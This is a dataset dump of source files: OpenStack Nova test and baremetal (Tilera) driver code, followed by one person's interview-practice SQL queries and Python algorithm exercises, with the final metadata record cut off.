vm_mode.get_from_instance(fake_instance).AndReturn(vm_mode.XEN)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.XEN,\n self._vmops._determine_vm_mode(fake_instance, None, None))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_hvm(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n\n fake_instance = \"instance\"\n vm_mode.get_from_instance(fake_instance).AndReturn(vm_mode.HVM)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n 
self._vmops._determine_vm_mode(fake_instance, None, None))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_pv(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'root': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n vm_utils.determine_is_pv(self._session, \"fake\", fake_disk_type,\n \"foo\").AndReturn(True)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.XEN,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_not_pv(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'root': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n vm_utils.determine_is_pv(self._session, \"fake\", fake_disk_type,\n \"foo\").AndReturn(False)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_not_pv_no_root_disk(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'iso': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_xsm_sr_check_relaxed_cached(self):\n self.make_plugin_call_count = 0\n\n def fake_make_plugin_call(plugin, method, **args):\n self.make_plugin_call_count = self.make_plugin_call_count + 1\n return \"true\"\n\n self.stubs.Set(self._vmops, \"_make_plugin_call\",\n fake_make_plugin_call)\n\n self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())\n self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())\n\n self.assertEqual(self.make_plugin_call_count, 1)\n"
},
{
"alpha_fraction": 0.6271790862083435,
"alphanum_fraction": 0.6315372586250305,
"avg_line_length": 29.409639358520508,
"blob_id": "0bcd71df91843633b1bcd2a6dfec93255873e4c1",
"content_id": "b18bfac857b584aafbfcd16da4c98a285521d12b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2524,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 83,
"path": "/nova/virt/baremetal/utils.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2012 NTT DOCOMO, INC.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport errno\nimport os\nimport shutil\n\nfrom nova.openstack.common import log as logging\nfrom nova.virt.disk import api as disk_api\nfrom nova.virt.libvirt import utils as libvirt_utils\n\nLOG = logging.getLogger(__name__)\n\n\ndef cache_image(context, target, image_id, user_id, project_id):\n if not os.path.exists(target):\n libvirt_utils.fetch_image(context, target, image_id,\n user_id, project_id)\n\n\ndef inject_into_image(image, key, net, metadata, admin_password,\n files, partition, use_cow=False):\n try:\n disk_api.inject_data(image, key, net, metadata, admin_password,\n files, partition, use_cow)\n except Exception as e:\n LOG.warn(_(\"Failed to inject data into image %(image)s. \"\n \"Error: %(e)s\") % locals())\n\n\ndef unlink_without_raise(path):\n try:\n os.unlink(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return\n else:\n LOG.warn(_(\"Failed to unlink %(path)s, error: %(e)s\") % locals())\n\n\ndef rmtree_without_raise(path):\n try:\n if os.path.isdir(path):\n shutil.rmtree(path)\n except OSError as e:\n LOG.warn(_(\"Failed to remove dir %(path)s, error: %(e)s\") % locals())\n\n\ndef write_to_file(path, contents):\n with open(path, 'w') as f:\n f.write(contents)\n\n\ndef create_link_without_raise(source, link):\n try:\n os.symlink(source, link)\n except OSError as e:\n if e.errno == errno.EEXIST:\n return\n else:\n LOG.warn(_(\"Failed to create symlink from %(source)s to %(link)s\"\n \", error: %(e)s\") % locals())\n\n\ndef random_alnum(count):\n import random\n import string\n chars = string.ascii_uppercase + string.digits\n return \"\".join(random.choice(chars) for _ in range(count))\n"
},
{
"alpha_fraction": 0.5718938112258911,
"alphanum_fraction": 0.5758436918258667,
"avg_line_length": 35.258792877197266,
"blob_id": "c5f9296ec49439f2e7f38b172a59d1ed9f3b9cd6",
"content_id": "d9a065bf10d44b27edfacb5d234841ff0f2026f7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14431,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 398,
"path": "/nova/virt/baremetal/tilera.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2011-2013 University of Southern California / ISI\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nClass for Tilera bare-metal nodes.\n\"\"\"\n\nimport base64\nimport os\n\nfrom oslo.config import cfg\n\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova.openstack.common.db import exception as db_exc\nfrom nova.openstack.common import fileutils\nfrom nova.openstack.common import log as logging\nfrom nova import utils\nfrom nova.virt.baremetal import baremetal_states\nfrom nova.virt.baremetal import base\nfrom nova.virt.baremetal import db\nfrom nova.virt.baremetal import utils as bm_utils\n\ntilera_opts = [\n cfg.StrOpt('net_config_template',\n default='$pybasedir/nova/virt/baremetal/'\n 'net-dhcp.ubuntu.template',\n help='Template file for injected network config'),\n ]\n\nLOG = logging.getLogger(__name__)\n\nbaremetal_group = cfg.OptGroup(name='baremetal',\n title='Baremetal Options')\n\nCONF = cfg.CONF\nCONF.register_group(baremetal_group)\nCONF.register_opts(tilera_opts, baremetal_group)\nCONF.import_opt('use_ipv6', 'nova.netconf')\n\nCHEETAH = None\n\n\ndef _get_cheetah():\n global CHEETAH\n if CHEETAH is None:\n from Cheetah import Template\n CHEETAH = Template.Template\n return CHEETAH\n\n\ndef build_network_config(network_info):\n try:\n assert isinstance(network_info, list)\n except AssertionError:\n network_info = [network_info]\n interfaces = []\n for id, (network, mapping) in enumerate(network_info):\n address_v6 = None\n gateway_v6 = None\n netmask_v6 = None\n if CONF.use_ipv6:\n address_v6 = mapping['ip6s'][0]['ip']\n netmask_v6 = mapping['ip6s'][0]['netmask']\n gateway_v6 = mapping['gateway_v6']\n interface = {\n 'name': 'eth%d' % id,\n 'address': mapping['ips'][0]['ip'],\n 'gateway': mapping['gateway'],\n 'netmask': mapping['ips'][0]['netmask'],\n 'dns': ' '.join(mapping['dns']),\n 'address_v6': address_v6,\n 'gateway_v6': gateway_v6,\n 'netmask_v6': netmask_v6,\n }\n interfaces.append(interface)\n\n cheetah = _get_cheetah()\n network_config = str(cheetah(\n open(CONF.baremetal.net_config_template).read(),\n searchList=[\n {'interfaces': interfaces,\n 'use_ipv6': CONF.use_ipv6,\n }\n ]))\n return network_config\n\n\ndef get_image_dir_path(instance):\n \"\"\"Generate the dir for an instances disk.\"\"\"\n return os.path.join(CONF.instances_path, instance['name'])\n\n\ndef get_image_file_path(instance):\n \"\"\"Generate the full path for an instances disk.\"\"\"\n return os.path.join(CONF.instances_path, instance['name'], 'disk')\n\n\ndef get_tilera_nfs_path(node_id):\n \"\"\"Generate the path for an instances Tilera nfs.\"\"\"\n tilera_nfs_dir = \"fs_\" + str(node_id)\n return os.path.join(CONF.baremetal.tftp_root, tilera_nfs_dir)\n\n\ndef get_partition_sizes(instance):\n instance_type = flavors.extract_instance_type(instance)\n root_mb = instance_type['root_gb'] * 1024\n swap_mb = instance_type['swap']\n\n if swap_mb < 1:\n swap_mb = 1\n\n return 
(root_mb, swap_mb)\n\n\ndef get_tftp_image_info(instance):\n \"\"\"\n Generate the paths for tftp files for this instance.\n\n Raises NovaException if\n - instance does not contain kernel_id\n \"\"\"\n image_info = {\n 'kernel': [None, None],\n }\n try:\n image_info['kernel'][0] = str(instance['kernel_id'])\n except KeyError as e:\n pass\n\n missing_labels = []\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n if not uuid:\n missing_labels.append(label)\n else:\n image_info[label][1] = os.path.join(CONF.baremetal.tftp_root,\n instance['uuid'], label)\n if missing_labels:\n raise exception.NovaException(_(\n \"Can not activate Tilera bootloader. \"\n \"The following boot parameters \"\n \"were not passed to baremetal driver: %s\") % missing_labels)\n return image_info\n\n\nclass Tilera(base.NodeDriver):\n \"\"\"Tilera bare metal driver.\"\"\"\n\n def __init__(self, virtapi):\n super(Tilera, self).__init__(virtapi)\n\n def _collect_mac_addresses(self, context, node):\n macs = set()\n for nic in db.bm_interface_get_all_by_bm_node_id(context, node['id']):\n if nic['address']:\n macs.add(nic['address'])\n return sorted(macs)\n\n def _cache_tftp_images(self, context, instance, image_info):\n \"\"\"Fetch the necessary kernels and ramdisks for the instance.\"\"\"\n fileutils.ensure_tree(\n os.path.join(CONF.baremetal.tftp_root, instance['uuid']))\n\n LOG.debug(_(\"Fetching kernel and ramdisk for instance %s\") %\n instance['name'])\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n bm_utils.cache_image(\n context=context,\n target=path,\n image_id=uuid,\n user_id=instance['user_id'],\n project_id=instance['project_id'],\n )\n\n def _cache_image(self, context, instance, image_meta):\n \"\"\"Fetch the instance's image from Glance\n\n This method pulls the relevant AMI and associated kernel and ramdisk,\n and the deploy kernel and ramdisk from Glance, and writes them\n to the appropriate places on local disk.\n\n Both sets of kernel and ramdisk are needed for Tilera booting, so these\n are stored under CONF.baremetal.tftp_root.\n\n At present, the AMI is cached and certain files are injected.\n Debian/ubuntu-specific assumptions are made regarding the injected\n files. 
In a future revision, this functionality will be replaced by a\n more scalable and os-agnostic approach: the deployment ramdisk will\n fetch from Glance directly, and write its own last-mile configuration.\n \"\"\"\n fileutils.ensure_tree(get_image_dir_path(instance))\n image_path = get_image_file_path(instance)\n\n LOG.debug(_(\"Fetching image %(ami)s for instance %(name)s\") %\n {'ami': image_meta['id'], 'name': instance['name']})\n bm_utils.cache_image(context=context,\n target=image_path,\n image_id=image_meta['id'],\n user_id=instance['user_id'],\n project_id=instance['project_id']\n )\n\n return [image_meta['id'], image_path]\n\n def _inject_into_image(self, context, node, instance, network_info,\n injected_files=None, admin_password=None):\n \"\"\"Inject last-mile configuration into instances image\n\n Much of this method is a hack around DHCP and cloud-init\n not working together with baremetal provisioning yet.\n \"\"\"\n partition = None\n if not instance['kernel_id']:\n partition = \"1\"\n\n ssh_key = None\n if 'key_data' in instance and instance['key_data']:\n ssh_key = str(instance['key_data'])\n\n if injected_files is None:\n injected_files = []\n else:\n injected_files = list(injected_files)\n\n net_config = build_network_config(network_info)\n\n if instance['hostname']:\n injected_files.append(('/etc/hostname', instance['hostname']))\n\n LOG.debug(_(\"Injecting files into image for instance %(name)s\") %\n {'name': instance['name']})\n\n bm_utils.inject_into_image(\n image=get_image_file_path(instance),\n key=ssh_key,\n net=net_config,\n metadata=instance['metadata'],\n admin_password=admin_password,\n files=injected_files,\n partition=partition,\n )\n\n def cache_images(self, context, node, instance,\n admin_password, image_meta, injected_files, network_info):\n \"\"\"Prepare all the images for this instance.\"\"\"\n tftp_image_info = get_tftp_image_info(instance)\n self._cache_tftp_images(context, instance, tftp_image_info)\n\n self._cache_image(context, instance, image_meta)\n self._inject_into_image(context, node, instance, network_info,\n injected_files, admin_password)\n\n def destroy_images(self, context, node, instance):\n \"\"\"Delete instance's image file.\"\"\"\n bm_utils.unlink_without_raise(get_image_file_path(instance))\n bm_utils.rmtree_without_raise(get_image_dir_path(instance))\n\n def activate_bootloader(self, context, node, instance):\n \"\"\"Configure Tilera boot loader for an instance\n\n Kernel and ramdisk images are downloaded by cache_tftp_images,\n and stored in /tftpboot/{uuid}/\n\n This method writes the instances config file, and then creates\n symlinks for each MAC address in the instance.\n\n By default, the complete layout looks like this:\n\n /tftpboot/\n ./{uuid}/\n kernel\n ./fs_node_id/\n \"\"\"\n image_info = get_tftp_image_info(instance)\n (root_mb, swap_mb) = get_partition_sizes(instance)\n tilera_nfs_path = get_tilera_nfs_path(node['id'])\n image_file_path = get_image_file_path(instance)\n\n deployment_key = bm_utils.random_alnum(32)\n db.bm_node_update(context, node['id'],\n {'deploy_key': deployment_key,\n 'image_path': image_file_path,\n 'pxe_config_path': tilera_nfs_path,\n 'root_mb': root_mb,\n 'swap_mb': swap_mb})\n\n if os.path.exists(image_file_path) and \\\n os.path.exists(tilera_nfs_path):\n utils.execute('mount', '-o', 'loop', image_file_path,\n tilera_nfs_path, run_as_root=True)\n\n def deactivate_bootloader(self, context, node, instance):\n \"\"\"Delete Tilera bootloader images and config.\"\"\"\n try:\n 
db.bm_node_update(context, node['id'],\n {'deploy_key': None,\n 'image_path': None,\n 'pxe_config_path': None,\n 'root_mb': 0,\n 'swap_mb': 0})\n except exception.NodeNotFound:\n pass\n\n tilera_nfs_path = get_tilera_nfs_path(node['id'])\n\n if os.path.ismount(tilera_nfs_path):\n utils.execute('rpc.mountd', run_as_root=True)\n utils.execute('umount', '-f', tilera_nfs_path, run_as_root=True)\n\n try:\n image_info = get_tftp_image_info(instance)\n except exception.NovaException:\n pass\n else:\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n bm_utils.unlink_without_raise(path)\n\n try:\n macs = self._collect_mac_addresses(context, node)\n except db_exc.DBError:\n pass\n\n if os.path.exists(os.path.join(CONF.baremetal.tftp_root,\n instance['uuid'])):\n bm_utils.rmtree_without_raise(\n os.path.join(CONF.baremetal.tftp_root, instance['uuid']))\n\n def _iptables_set(self, node_ip, user_data):\n \"\"\"\n Sets security setting (iptables:port) if needed.\n\n iptables -A INPUT -p tcp ! -s $IP --dport $PORT -j DROP\n /tftpboot/iptables_rule script sets iptables rule on the given node.\n \"\"\"\n rule_path = CONF.baremetal.tftp_root + \"/iptables_rule\"\n if user_data is not None:\n open_ip = base64.b64decode(user_data)\n utils.execute(rule_path, node_ip, open_ip)\n\n def activate_node(self, context, node, instance):\n \"\"\"Wait for Tilera deployment to complete.\"\"\"\n\n locals = {'error': '', 'started': False}\n\n try:\n row = db.bm_node_get(context, node['id'])\n if instance['uuid'] != row.get('instance_uuid'):\n locals['error'] = _(\"Node associated with another instance\"\n \" while waiting for deploy of %s\")\n\n status = row.get('task_state')\n if (status == baremetal_states.DEPLOYING and\n locals['started'] == False):\n LOG.info(_('Tilera deploy started for instance %s')\n % instance['uuid'])\n locals['started'] = True\n elif status in (baremetal_states.DEPLOYDONE,\n baremetal_states.BUILDING,\n baremetal_states.ACTIVE):\n LOG.info(_(\"Tilera deploy completed for instance %s\")\n % instance['uuid'])\n node_ip = node['pm_address']\n user_data = instance['user_data']\n try:\n self._iptables_set(node_ip, user_data)\n except Exception as ex:\n self.deactivate_bootloader(context, node, instance)\n raise exception.NovaException(_(\"Node is \"\n \"unknown error state.\"))\n elif status == baremetal_states.DEPLOYFAIL:\n locals['error'] = _(\"Tilera deploy failed for instance %s\")\n except exception.NodeNotFound:\n locals['error'] = _(\"Baremetal node deleted while waiting \"\n \"for deployment of instance %s\")\n\n if locals['error']:\n raise exception.InstanceDeployFailure(\n locals['error'] % instance['uuid'])\n\n def deactivate_node(self, context, node, instance):\n pass\n"
}
] | 3 |
nperera0/coding | https://github.com/nperera0/coding | 4fbb21cc47f93b67a3b1c8e7362fdc47d1562da4 | fa61a9b1fdfbba800ea112ef157653096cb36cb4 | 6cadaecca4fc7044348076fe3d7aeccbef96283e | refs/heads/master | 2023-01-20T04:24:21.477659 | 2020-11-25T14:15:28 | 2020-11-25T14:15:28 | 315,776,071 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7237163782119751,
"alphanum_fraction": 0.7334963083267212,
"avg_line_length": 26.233333587646484,
"blob_id": "b5d2fbc27c2a43dbb3a8e7fcb3b4f6ed3cb6493f",
"content_id": "b1adbd4c3402a72a6d8ece2e564066932aaa9139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 30,
"path": "/support_tickets.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\nCREATE TABLE events AS (\n user_id INTEGER,\n event_ts TIMESTAMP,\n event_key VARCHAR(255),\n event_value VARCHAR(2000),\n);\n\n- assume this is all events for just one single course\n- assume that event_key = ‘support’ refers to a support event\n- assume that event_key = ‘purchase’ refers to paying for a course.\n\n\nHow do you determine the number of people who end up paying for a course after submitting at least two support tickets?\n\nS\nS\nP\nS\n\nWITH all_support AS (\n SELECT user_id, event_ts FROM events WHERE event_key = ‘support’),\n\nWITH all_purchase AS (\n SELECT user_id, event_ts FROM events WHERE event_key = ‘purchase’),\n\nSELECT user_id FROM all_support JOIN all_purchase\nON all_support.user_id = all_purchase.user_id\nWHERE all_support.event_ts < all_purchase.event_ts\nGROUP BY user_id\nHAVING COUNT(*) > 2\n"
},
{
"alpha_fraction": 0.5837209224700928,
"alphanum_fraction": 0.5883721113204956,
"avg_line_length": 17.69565200805664,
"blob_id": "f8f218bd551eebdfa33459471212f757f1a10792",
"content_id": "ce8696664710f8a62f31fe619185b0c1e6108742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 23,
"path": "/permutations.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\n Write a function that returns all permutations of a given list.\n'''\n\ndef perm_helper(prefix, suffix, ret):\n if suffix == \"\":\n ret.append(prefix)\n return\n\n for i in range(len(suffix)):\n perm_helper(prefix + suffix[i], suffix[0:i] + suffix[i+1::], ret)\n\n return ret\n\n\ndef permutations(s):\n ret = []\n return perm_helper(\"\", s, ret)\n\nout = permutations(\"abcd\")\n\nfor t in out:\n print(t)\n"
},
{
"alpha_fraction": 0.7509942054748535,
"alphanum_fraction": 0.7601712942123413,
"avg_line_length": 56.35087585449219,
"blob_id": "9f1e92fd9cce2182fda24e7b36fef41d05064778",
"content_id": "d33ac2959499243e6f3ab378600304c7e70359d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3269,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 57,
"path": "/course_progress_funnel.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "WITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\ncourses AS (\nSELECT DISTINCT course_id FROM course-funnel-assignment.data.raw_data),\n\nstarted_cur_7_day AS (\nSELECT dates.date, course_id, module_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id ),\n\nstarted_prev_7_day AS (\nSELECT dates.date, course_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 13 DAY) AND DATE(item_start_ts) <= DATE_SUB(dates.date, INTERVAL 7 DAY)\nGROUP BY dates.date, course_id, user_id ),\n\ncompleted_modules_in_past AS (\nSELECT * EXCEPT (rank) FROM (\n SELECT dates.date, course_id, module_id, user_id, item_complete_ts, DENSE_RANK() OVER (PARTITION BY course_id, module_id, user_id ORDER BY item_complete_ts) AS rank\n FROM `course-funnel-assignment.data.raw_data` JOIN dates\n ON DATE(item_complete_ts) <= dates.date )\nWHERE rank = 4),\n\nweekly_course_actives AS (\nSELECT date, course_id, COUNT(DISTINCT user_id) AS cnt FROM started_cur_7_day\nGROUP BY date, course_id ),\n\nweekly_course_retained_learners AS (\nSELECT cur.date, cur.course_id, COUNT(DISTINCT cur.user_id) AS cnt FROM started_cur_7_day cur JOIN started_prev_7_day prev\nON cur.date = prev.date AND cur.course_id = prev.course_id AND cur.user_id = prev.user_id\nGROUP BY cur.date, cur.course_id ),\n\nweekly_course_progressed_learners AS (\nSELECT cur.date, cur.course_id, COUNT(DISTINCT cur.user_id) AS cnt FROM started_cur_7_day cur JOIN completed_modules_in_past comp\nON cur.date = comp.date AND cur.course_id = comp.course_id\n AND cur.user_id = comp.user_id AND cur.module_id != comp.module_id\nGROUP BY cur.date, cur.course_id ),\n\nweekly_course_passed_learners AS (\nSELECT date, course_id, COUNT(user_id) AS cnt FROM (\n SELECT dates.date, course_id, user_id FROM completed_modules_in_past JOIN dates\n ON DATE(item_complete_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_complete_ts) <= dates.date\n GROUP BY dates.date, course_id, user_id\n HAVING COUNT(module_id) >= 4 )\nGROUP BY date, course_id )\n\nSELECT dates.date, courses.course_id,\n weekly_course_actives.cnt AS Weekly_Course_Actives,\n weekly_course_retained_learners.cnt AS Weekly_Course_Retained_Learners,\n weekly_course_progressed_learners.cnt AS Weekly_Course_Progressed_Learners,\n weekly_course_passed_learners.cnt AS Weekly_Course_Passed_Learners\nFROM dates CROSS JOIN courses\n LEFT JOIN weekly_course_actives ON dates.date = weekly_course_actives.date AND courses.course_id = weekly_course_actives.course_id\n LEFT JOIN weekly_course_retained_learners ON dates.date = weekly_course_retained_learners.date AND courses.course_id = weekly_course_retained_learners.course_id\n LEFT JOIN weekly_course_progressed_learners ON dates.date = weekly_course_progressed_learners.date AND courses.course_id = weekly_course_progressed_learners.course_id\n LEFT JOIN weekly_course_passed_learners ON dates.date = weekly_course_passed_learners.date AND courses.course_id = weekly_course_passed_learners.course_id\nORDER BY dates.date, courses.course_id\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.6419098377227783,
"avg_line_length": 17.850000381469727,
"blob_id": "be472eb0e2fdf0e199fe432f8f3a728df449aa1d",
"content_id": "00e5857d8a18b633407a834daa2d0a81c4d811e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 20,
"path": "/array.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\n returns most frequent number in an array of integers\n'''\n\ndef most_frequent_int(array): # O(n)\n if len(array) == 0:\n return None\n\n dictionary = dict()\n\n for element in array:\n if element in dictionary:\n dictionary[element] += 1\n else:\n dictionary[element] = 1\n\n return max(dictionary, key=dictionary.get)\n\n\nprint(most_frequent_int([1,2,3,4,5]))\n"
},
{
"alpha_fraction": 0.73667311668396,
"alphanum_fraction": 0.7482337951660156,
"avg_line_length": 22.953845977783203,
"blob_id": "355b4108d0d3ae00a97b98954b4fe25a9d9d9814",
"content_id": "380e85cc159f1ab839ec24c5ef685d4f823ad150",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1557,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 65,
"path": "/university_enrollment.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "-- Any user who has registered\nCREATE TABLE users AS (\n user_id INTEGER,\n email VARCHAR,\n PRIMARY KEY (user_id)\n);\n-- Any user who has enrolled in a course\nCREATE TABLE enrollments AS (\n user_id INTEGER,\n course_id INTEGER,\n PRIMARY KEY (user_id, course_id)\n);\nCREATE TABLE courses_universities AS (\n course_id INTEGER,\n university_id INTEGER,\n PRIMARY KEY (course_id, university_id)\n);\n\n\n\nSELECT COUNT(1) --200\nFROM enrollments;\n\nSELECT COUNT(1) -- 240\nFROM enrollments AS e\nJOIN courses_universities AS cu\n ON e.course_id = cu.course_id\n;\n\n\n--Enrollments by university\n\nSELECT university_id, COUNT(user_id)\nFROM enrollments JOIN courses_universities\nON enrollments.course_id = courses_universities.course_id\nGROUP BY university_id\n\n\n--number of enrollments by user\n\nSELECT user_id, COUNT(course_id) FROM enrollments\nGROUP BY user_id\n\n--overall average number of enrollments\n\nSELECT CAST(COUNT(course_id IS NOT NULL), FLOAT)/CAST(COUNT(DISTINCT user_id), FLOAT) * 100.00\nFROM users LEFT JOIN enrollments\nON users.user_id = enrollments.user_id\n\n\n--list the users who have not enrolled\n\nSELECT DISTINCT user_id FROM users WHERE user_id NOT IN (SELECT DISTINCT user_id FROM enrollments)\n\n--total count of users who have not enrolled\n\nSELECT COUNT(user_id) FROM users\nWHERE user_id NOT IN (SELECT DISTINCT user_id FROM enrollments)\n\n\n--overall % of users who have not enrolled in a course\n\nSELECT CAST(COUNT(course_id IS NULL), FLOAT)/CAST(COUNT(*), FLOAT) * 100.00\nFROM users LEFT JOIN enrollments\nON users.user_id = enrollments.user_id\n"
},
{
"alpha_fraction": 0.4272445738315582,
"alphanum_fraction": 0.4721362292766571,
"avg_line_length": 22.925926208496094,
"blob_id": "f3c34a9be5d7a53db5b79ae8baa5bf61cb787ffb",
"content_id": "107fc0ecfcd6797229b134828b025a2eced3411b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1292,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 54,
"path": "/number_of_islands.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an m x n 2d grid map of '1's (land) and '0's (water), return the number of islands.\n\nAn island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically.\nYou may assume all four edges of the grid are all surrounded by water.\n\nExample 1:\n\nInput: grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nOutput: 1\nExample 2:\n\nInput: grid = [\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"1\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"1\",\"1\"]\n]\nOutput: 3\n\n'''\n\n\nclass Solution(object):\n def numIslands(self, grid):\n \"\"\"\n :type grid: List[List[str]]\n :rtype: int\n \"\"\"\n islands = 0\n\n for i, raw in enumerate(grid):\n for j, col in enumerate(raw):\n\n if(grid[i][j] == '1'):\n islands += 1\n self.flood_bfs(i,j, grid)\n\n return islands\n\n def flood_bfs(self, i, j, grid):\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[i]) or grid[i][j] == '0':\n return\n else:\n grid[i][j] = '0'\n self.flood_bfs( i+1, j, grid)\n self.flood_bfs( i-1, j, grid)\n self.flood_bfs( i, j+1, grid)\n self.flood_bfs( i, j-1, grid)\n"
},
{
"alpha_fraction": 0.6601941585540771,
"alphanum_fraction": 0.6650485396385193,
"avg_line_length": 21.88888931274414,
"blob_id": "b4b7f50edb7173e67fed5b8754ecea91d9012cdd",
"content_id": "5c596cf110a97d5f3048c178985723cc2c7b5227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 9,
"path": "/reverseString.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "def reverse_words(sentence): # sentence here is an array of characters\n\n word_list = sentence.split()\n rev = word_list[::-1]\n ret = ' '.join(rev)\n\n return ret\n\nprint(reverse_words('We love Python'))\n"
},
{
"alpha_fraction": 0.3757094144821167,
"alphanum_fraction": 0.39727583527565,
"avg_line_length": 20.487804412841797,
"blob_id": "c8be0debcb1bf5e89cf286974a009ea25689e8c0",
"content_id": "c2598d8ce87f4bfb16e96a05b1205e7728d79883",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 41,
"path": "/TreasureIsland.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
